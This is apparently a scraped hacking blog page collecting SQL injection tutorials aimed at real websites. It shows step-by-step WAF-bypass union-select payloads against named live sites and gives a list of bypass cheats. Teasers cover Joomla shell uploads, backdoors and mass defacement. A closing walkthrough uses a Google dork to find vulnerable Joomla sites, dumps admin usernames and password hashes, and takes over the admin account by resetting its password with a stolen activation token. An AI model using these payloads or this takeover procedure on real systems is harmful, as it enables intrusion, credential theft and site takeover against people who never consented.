<div dir="ltr">
<code><span style="color: #66ccff;">www</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">bryansmarine</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">com</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">details</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">php</span><span style="color: #7ac07c;">?</span><span style="color: #66ccff;">id</span><span style="color: #7ac07c;">=</span><span style="color: #66ccff;">319 union select 1 </span></code></div>
</div>
</div>
<br />
<div>
<div class="spoiler_header">
Spoiler <a href="http://www.blogger.com/blogger.g?blogID=1523573398630292934">(Click to View)</a></div>
</div>
<br />
now to Skip this error 500 Internal server error or 500 forbiden we use BoF+Attacks Query<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
PHP Code:</div>
<div class="body">
<div dir="ltr">
<code><span style="color: #7ac07c;">+And(</span><span style="color: #66ccff;">select 1</span><span style="color: #7ac07c;">)=(</span><span style="color: #66ccff;">select 0x4141414141414141414141414141414141414141414141414141414141414141414141414

14141414141414141414141414141414141414141414141414141414141414141414141414141414

14141414141414141414141414141414141414141414141414141414141414141414141414141414
1414141</span><span style="color: #7ac07c;">)+ </span></code></div>
</div>
</div>
<br />
If this  Query doesn't work we can use this Query [ 1000  of A ]<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
PHP Code:</div>
<div class="body">
<div dir="ltr">
<code><span style="color: #7ac07c;">+and (</span><span style="color: #ffcccc;">/*!select*/ </span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">)=(</span><span style="color: #ffcccc;">/*!select*/ </span><span style="color: #66ccff;">0xAA</span><span style="color: #7ac07c;">)+ </span></code></div>
</div>
</div>
<br />
ok now we will put this Query befor union select to bypassing erro<br />
<br />
☆¸.•*☆ demo ☆*•.¸☆ <br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
PHP Code:</div>
<div class="body">
<div dir="ltr">
<code><span style="color: #66ccff;">www</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">bryansmarine</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">com</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">details</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">php</span><span style="color: #7ac07c;">?</span><span style="color: #66ccff;">id</span><span style="color: #7ac07c;">=</span><span style="color: #66ccff;">319</span><span style="color: #7ac07c;">+And(</span><span style="color: #66ccff;">select 1</span><span style="color: #7ac07c;">)=(</span><span style="color: #66ccff;">select 0x4141414141414141414141414141414141414141414141414141414141414141414141414

14141414141414141414141414141414141414141414141414141414141414141414141414141414

14141414141414141414141414141414141414141414141414141414141414141414141414141414
1414141</span><span style="color: #7ac07c;">)+</span><span style="color: #66ccff;">union select 1 </span></code></div>
</div>
</div>
<br />
<div>
<div class="spoiler_header">
Spoiler <a href="http://www.blogger.com/blogger.g?blogID=1523573398630292934">(Click to View)</a></div>
</div>
<br />
aha now we have this error <br />
<div class="codeblock phpcodeblock">
<div class="title">
PHP Code:</div>
<div class="body">
<div dir="ltr">
<code><span style="color: #66ccff;">Unknown table </span><span style="color: #ff99ff;">'articles' </span><span style="color: #66ccff;">in field </span><span style="color: #7ac07c;">list </span></code></div>
</div>
</div>
it's mean column count is not right now we try play with number of column <br />
any way I found column count it's 35 #<br />
<br />
☆¸.•*☆ demo ☆*•.¸☆<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
PHP Code:</div>
<div class="body">
<div dir="ltr">
<code><span style="color: #66ccff;">www</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">bryansmarine</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">com</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">details</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">php</span><span style="color: #7ac07c;">?</span><span style="color: #66ccff;">id</span><span style="color: #7ac07c;">=</span><span style="color: #66ccff;">319</span><span style="color: #7ac07c;">+And(</span><span style="color: #66ccff;">select 1</span><span style="color: #7ac07c;">)=(</span><span style="color: #66ccff;">select 0x4141414141414141414141414141414141414141414141414141414141414141414141414

14141414141414141414141414141414141414141414141414141414141414141414141414141414

14141414141414141414141414141414141414141414141414141414141414141414141414141414
1414141</span><span style="color: #7ac07c;">)+</span><span style="color: #66ccff;">union select 1</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">2</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">3</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">4</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">5</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">6</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">7</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">8</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">9</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">10</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">11</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">12</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">13</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">14</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">15</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">16</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">17</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">18</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">19</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">20</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">21</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">22</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">23</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">24</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">25</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">26</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">27</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">28</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">29</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">30</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">31</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">32</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">33</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">34</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">35</span><span style="color: #7ac07c;">-- </span></code></div>
</div>
</div>
<br />
<div>
<div class="spoiler_header">
Spoiler <a href="http://www.blogger.com/blogger.g?blogID=1523573398630292934">(Click to View)</a></div>
</div>
<br />
<span style="color: orange;">☆¸.•*☆#  400 bad request  #  thx <span style="color: mediumblue;">benzi</span> # ☆*•.¸☆</span><br />
<br />
If we have error 400 bad request  like this<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
PHP Code:</div>
<div class="body">
<div dir="ltr">
<code><span style="color: #66ccff;">tibikra</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">huntscape</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">lt</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">highscore</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">personal</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">php</span><span style="color: #7ac07c;">?</span><span style="color: #66ccff;">name</span><span style="color: #7ac07c;">=</span><span style="color: #66ccff;">lauras469</span><span style="color: #ff99ff;">' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,
29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 +--+/ </span></code></div>
</div>
</div>
<br />
<div>
<div class="spoiler_header">
Spoiler <a href="http://www.blogger.com/blogger.g?blogID=1523573398630292934">(Click to View)</a></div>
</div>
<br />
it's mean : Your browser sent a request that this server could not understand .<br />
and to bypassing this erro<br />
<br />
first we need to know from where this error begin do  like this<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
PHP Code:</div>
<div class="body">
<div dir="ltr">
<code><span style="color: #66ccff;">tibikra</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">huntscape</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">lt</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">highscore</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">personal</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">php</span><span style="color: #7ac07c;">?</span><span style="color: #66ccff;">name</span><span style="color: #7ac07c;">=</span><span style="color: #66ccff;">lauras469</span><span style="color: #ff99ff;">' union </span></code></div>
</div>
</div>
<br />
nothing happening no 400 bad request error<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
PHP Code:</div>
<div class="body">
<div dir="ltr">
<code><span style="color: #66ccff;">tibikra</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">huntscape</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">lt</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">highscore</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">personal</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">php</span><span style="color: #7ac07c;">?</span><span style="color: #66ccff;">name</span><span style="color: #7ac07c;">=</span><span style="color: #66ccff;">lauras469</span><span style="color: #ff99ff;">' union select </span></code></div>
</div>
</div>
<br />
nothing happening no 400 bad request error<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
PHP Code:</div>
<div class="body">
<div dir="ltr">
<code><span style="color: #66ccff;">tibikra</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">huntscape</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">lt</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">highscore</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">personal</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">php</span><span style="color: #7ac07c;">?</span><span style="color: #66ccff;">name</span><span style="color: #7ac07c;">=</span><span style="color: #66ccff;">lauras469</span><span style="color: #ff99ff;">' union select 1 +--+/ </span></code></div>
</div>
</div>
<br />
nothing happening no 400 bad request error<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
PHP Code:</div>
<div class="body">
<div dir="ltr">
<code><span style="color: #66ccff;">tibikra</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">huntscape</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">lt</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">highscore</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">personal</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">php</span><span style="color: #7ac07c;">?</span><span style="color: #66ccff;">name</span><span style="color: #7ac07c;">=</span><span style="color: #66ccff;">lauras469</span><span style="color: #ff99ff;">' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 +--+/ </span></code></div>
</div>
</div>
<br />
nothing happening no 400 bad request error<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
PHP Code:</div>
<div class="body">
<div dir="ltr">
<code><span style="color: #66ccff;">tibikra</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">huntscape</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">lt</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">highscore</span><span style="color: #7ac07c;">/</span><span style="color: #66ccff;">personal</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">php</span><span style="color: #7ac07c;">?</span><span style="color: #66ccff;">name</span><span style="color: #7ac07c;">=</span><span style="color: #66ccff;">lauras469</span><span style="color: #ff99ff;">' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 +--+/ </span></code></div>
</div>
</div>
<br />
Oh 400 bad request error<br />
now we know this error begining from column 19 that's appear no error 
and to bypassing this error we will add --+%0A after nomber of column 
like this <br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
PHP Code:</div>
<div class="body">
<div dir="ltr">
<code><span style="color: #66ccff;">19</span><span style="color: #7ac07c;">--+%</span><span style="color: #66ccff;">0A</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">20</span><span style="color: #7ac07c;">--+%</span><span style="color: #66ccff;">0A</span><span style="color: #7ac07c;">,</span><span style="color: #66ccff;">21</span><span style="color: #7ac07c;">--+%</span><span style="color: #66ccff;">0A  etc </span><span style="color: #7ac07c;">.... </span></code></div>
</div>
</div>
<br />
☆¸.•*☆ demo ☆*•.¸☆<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
PHP Code:</div>
<div class="body">
<div dir="ltr">
<code><span style="color: #66ccff;">http</span><span style="color: #7ac07c;">:</span><span style="color: #ffcccc;">//tibikra.huntscape.lt/highscore/personal.php?name=lauras469'and false UNION select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+%0A,20--+%0A,21--+%0A,22--+%0A,23--+%0A,24--+%0A,25--+%0A,26--+%0A,27--+%0A,28--+%0A,29--+%0A,30--+%0A,31--+%0A,32--+%0A,33--+%0A,34--+%0A,35--+%0A,36--+%0A,37--+%0A,38--+%0A,39--+%0A,40--+%0A,41--+%0A,42--+%0A,43--+%0A,44--+%0A,45--+%0A,46--+%0A,47--+%0A,48--+%0A,49--+ </span></code></div>
</div>
</div>
<br />
<span style="color: orange;">hackforums.net</span>

WAF Bypassing For beginners and Easy

First sorry for my english and I make thread about WAF bypassing error For beginners ☆¸.•*☆ How to know if Web Application Firewalls! on/off ☆*•.¸☆ to know this we will use this statement after site l…

08 Sep 2012

Joomla | NEW Shell Upload Vulnerability

Joomla | NEW Shell Upload Vulnerability

Tanpa basa-basi :D (malas ngetik) Google Dork: inurl:index.php?option=com_fabrik > Upload Shell Lokasi shell: www.site.com/media/shell_name.php Selesai ^_^…

08 Sep 2012

Bypass Forbidden (WAF) @>Sql Injection

Sore para pentester :p<br />
udah lama g update blog cupu ini..<br />
bru ad wktu soalx ckckckc...<br />
<br />
kali ini ane mau share beberapa cheat utk bypass WAF (Web Application Firewall) [nemu jg] wkwkwk<br />
cekidott..<br />
<blockquote class="tr_bq"><ol><li>1+Union+/*!select*/+1,2,3--</li>
<li>1+/*!union*/+all+/*!select*/!+1,2,3--</li>
<li>1+/**//*!union*//**//*!select*//**/+1,2,3-- </li>
<li>1+union++++all++++select/+1,2,3--</li>
<li>1+/union+%23%0aselect/+1,2,3-- </li>
<li>1+/**/union/**/all/*!50000select*/+1,2,3--</li>
<li>1+union+distinct+select+1,2,3-- </li>
<li>1+/*!union*/+/*!50000SELECT*/+1,2,3--</li>
<li>1+UNION ALL/*!50000SELECT ALL 1 */+1,2,3-- </li>
<li>1+un/**/ion+se/**/lect+1,2,3-- </li>
<li>1+uni%0Bon+se%0Blect+1,2,3-- </li>
<li>1+UNunionION+SEselectLECT+1,2,3--</li>
<li>1+UnIoN/**/SeLecT/**/1,2,3--</li>
<li>1+un/**/ion+se/**/lect+1,2,3--</li>
</ol></blockquote><br />
NB: tidak semuanya bsa di bypass dgn cheat diatas,.. semua tergantung admin web :)<br />
<br />
#selesai

Bypass Forbidden (WAF) @>Sql Injection

Sore para pentester :p udah lama g update blog cupu ini.. bru ad wktu soalx ckckckc... kali ini ane mau share beberapa cheat utk bypass WAF (Web Application Firewall) [nemu jg] wkwkwk cekidott.. 1+Uni…

28 Aug 2012

[Share] Backdoor :p

[Share] Backdoor :p

Kayaknya g usah ane jelasin yg dimaksud backdoor yee.. pst kalian udah pada tau. ckckck sekirannya backdoornya cuma untuk pembelajaran.. jgn dibikin rusuh cekidot:!! http://tlphotography.co.za/images/…

27 Jun 2012

Malaysia Claim Tarian Tor Tor, Hacker Indonesia Mengamuk !!

Malaysia Claim Tarian Tor Tor, Hacker Indonesia Mengamuk !!

Malaysia klaim tari tor-tor !! hacker indonesia mengamuk !!!!!!!!!!!! >. puluhan bahkan ratusan website malaysia kena deface oleh hacker indonesia beberapa website malaysia yg blm di patch http://tnim…

21 Jun 2012

Hacking Administrator Joomla – Get Full Access!

<div class="separator" style="clear: both; text-align: center;"></div><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">Tools required:</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">SQL-i Knowledge</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">reiluke SQLiHelper 2.7</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">Joomla! Query Knowledge</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">Finding Exploit And Target</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">Those two steps could go in different order, depend what you find first target or exploit…<br />
Google dork: inurl:”option=com_idoblog”<br />
Comes up with results for about 140,000 pages</span> <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img838.imageshack.us/img838/300/001cv.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="http://img838.imageshack.us/img838/300/001cv.png" width="320" /></a></div><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">At inj3ct0r.com search for: com_idoblog</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln</span> <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img836.imageshack.us/img836/1907/002rg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="http://img836.imageshack.us/img836/1907/002rg.png" width="320" /></a></div><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">==<br />
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln<br />
==<br />
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16+from+jos_users–<br />
Exploit can be separated in two parts:<br />
Part I<br />
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62<br />
This part opening blog Admin page and if Admin page don’t exist, exploit won’t worked (not completely confirmed)<br />
Part II<br />
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–<br />
This part looking for username and password from jos_users table</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">Testing Vulnerability</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">Disable images for faster page loading:<br />
[Firefox]<br />
Tools >> Options >> Content (tab menu) >> and unclick ‘Load images automatically’<br />
Go to:</span><br />
<div class="codeblock" style="background-color: white; border: 1px solid rgb(204, 204, 204); font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; padding: 4px; text-align: left;"><div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin: 4px 0px;">Code:</div><div class="body" dir="ltr"><code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow: auto;">http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22</code></div></div><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">Site load normally…<br />
Go to:</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><div class="codeblock" style="background-color: white; border: 1px solid rgb(204, 204, 204); font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; padding: 4px; text-align: left;"><div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin: 4px 0px;">Code:</div><div class="body" dir="ltr"><code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow: auto;">http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62</code></div></div><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">Site content blog Profile Admin<br />
Go to:</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><div class="codeblock" style="background-color: white; border: 1px solid rgb(204, 204, 204); font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; padding: 4px; text-align: left;"><div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin: 4px 0px;">Code:</div><div class="body" dir="ltr"><code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow: auto;">http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--</code></div></div><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">Site is vulnerable</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">Inject Target</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">Open reiluke SQLiHelper 2.7<br />
In Target copy</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><div class="codeblock" style="background-color: white; border: 1px solid rgb(204, 204, 204); font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; padding: 4px; text-align: left;"><div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin: 4px 0px;">Code:</div><div class="body" dir="ltr"><code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow: auto;">http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62</code></div></div><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">and click on Inject<br />
Follow standard steps until you find Column Name, as a result we have </span> <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img834.imageshack.us/img834/7643/003bd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="http://img834.imageshack.us/img834/7643/003bd.png" width="320" /></a></div><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">Notice that exploit from inj3ct0r wouldn’t work here because it looking for jos_users table and as you can see</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">our target use jos153_users table for storing data</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">Let Dump username, email, password from Column Name jos153_users. Click on Dump Now</span> <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img217.imageshack.us/img217/3421/004k.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="71" src="http://img217.imageshack.us/img217/3421/004k.png" width="320" /></a></div><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">username: admin<br />
email: info@site.com<br />
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI<br />
Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a<br />
32 character salt that is appended to the end of the password string. The password is stored as<br />
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time…<br />
The easiest way to hack is to reset Admin password!</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">Admin Password Reset</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">Go to:</span><br />
<div class="codeblock" style="background-color: white; border: 1px solid rgb(204, 204, 204); font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; padding: 4px; text-align: left;"><div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin: 4px 0px;">Code:</div><div class="body" dir="ltr"><code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow: auto;">http://www.site.com/index.php?option=com_user&view=reset</code></div></div><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">This is standard Joomla! query for password reset request</span> <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img29.imageshack.us/img29/7562/005hy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="109" src="http://img29.imageshack.us/img29/7562/005hy.png" width="320" /></a></div><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">Forgot your Password? page will load.<br />
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.<br />
If you find right admin email, Confirm your account. page will load, asking for Token</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;">Finding Token</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users</span> <br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img691.imageshack.us/img691/1796/006fj.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="http://img691.imageshack.us/img691/1796/006fj.png" width="320" /></a></div><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">username: admin</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">activation: 5482dd177624761a290224270fa55f1d</span><br style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;" /><span style="background-color: #efefef; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; text-align: left;">5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.</span><div><div class="separator" style="clear: both; text-align: center;"><a href="http://img576.imageshack.us/img576/1710/007pa.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" 